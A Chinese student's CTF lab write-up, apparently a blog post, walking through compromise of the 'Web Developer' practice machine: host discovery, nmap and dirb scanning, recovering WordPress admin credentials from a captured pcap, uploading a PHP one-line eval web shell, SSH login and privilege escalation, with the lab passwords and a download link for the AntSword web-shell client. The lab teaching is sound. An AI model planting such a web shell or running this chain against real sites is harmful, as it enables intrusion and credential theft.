亚洲第一小鲜肉的第四次实验:CTF实践


前言

这是最后一次实验啦,让我们进入实战演练,以下拿CTF竞赛为例


实验内容如下
目的:获取靶机Web Developer 文件/root/flag.txt中flag。
基本思路:本网段IP地址存活扫描(netdiscover);网络扫描(Nmap);浏览HTTP 服务;网站目录枚举(Dirb);发现数据包文件 “cap”;分析 “cap” 文件,找到网站管理后台账号密码;插件利用(有漏洞);利用漏洞获得服务器账号密码;SSH 远程登录服务器;tcpdump另类应用。

一、发现目标,找到WebDeveloper的IP地址。

可通过前面介绍过的arpspoof来获得ip地址(netdiscover比较久)
命令行:arp-scan -l
在这里插入图片描述
(第一、第二个ip地址应该是网关,可以不用管,重点在于后面两个ip地址必有一个是我们所要寻找的ip地址,在浏览器中输入ip地址,便可得到WebDeveloper的网站)
在这里插入图片描述

二、利用NMAP扫描目标主机,发现目标主机端口开放、服务情况

在这里插入图片描述

三、若目标主机提供了HTTP服务,尝试利用浏览器访问目标网站。是否有可用信息?

进入网站后可发现网站存在一个后台登录链接

在这里插入图片描述

在这里插入图片描述

四、探测目标网站使用的CMS模板。分析使用的CMS是什么?

推荐大家去火狐附加组件下载一个插件

在这里插入图片描述

在你所打开的网站点击使用就可以直接查看CMS模板了

在这里插入图片描述

五、网络搜索wpscan,简要说明其功能。

WPScan是一款针对wwordpress的安全扫描软件;WPScan可以扫描出wordpress的版本,主题,插件,后台用户以及爆破后台用户密码等
--百度百科

六、使用 Dirb 爆破网站目录。找到一个似乎和网络流量有关的目录(路径)。

易知,ipdata是我们要找的目录(大佬说的)

在这里插入图片描述

七、浏览器访问该目录(路径),发现一个cap文件。

在这里插入图片描述

八、利用Wireshark分析该数据包,分析TCP数据流。找到什么有用的信息?

利用我们前面学到的知识,可先去查看tcp流中是否存在post包,里面是否存在帐号密码之类的信息

在这里插入图片描述

第一个明显不是我们要的

在这里插入图片描述

可看到帐号为:webdeveloper,密码为:Te5eQg&4sBS!Yr$)wf%(DcAd

九、利用上一步得到的信息进入网站后台。

在这里插入图片描述

十、查看wp-config.php获得账号及口令

(可以上网查看一下一句话木马的使用方法,配合上蚁剑风味更佳)`
<?php @eval($_POST['attack']) ?>
建立一个文本文件将其复制进去,然后改成.php文件上传到网页

在这里插入图片描述

按照如下步骤进行,命令行在图中以给出

在这里插入图片描述

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

可以看到帐号为:webdeveloper,密码为:MasterOfTheUniverse

十一、SSH登录服务器,尝试利用上一步获得的访问数据库的用户名和密码连接远程服务器。

命令行:ssh 帐号@ip地址

在这里插入图片描述

普通用户的权限查看不了root文件,必须将其提权
在这里插入图片描述

命令行在图中已给出
在这里插入图片描述


总结

蚁剑链接
链接:https://pan.baidu.com/s/1b4DKcE_e6Ih3Z03s1Ax9Gg
提取码:qfwc
具体安装方法:https://blog.csdn.net/qq_36235492/article/details/85713821

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值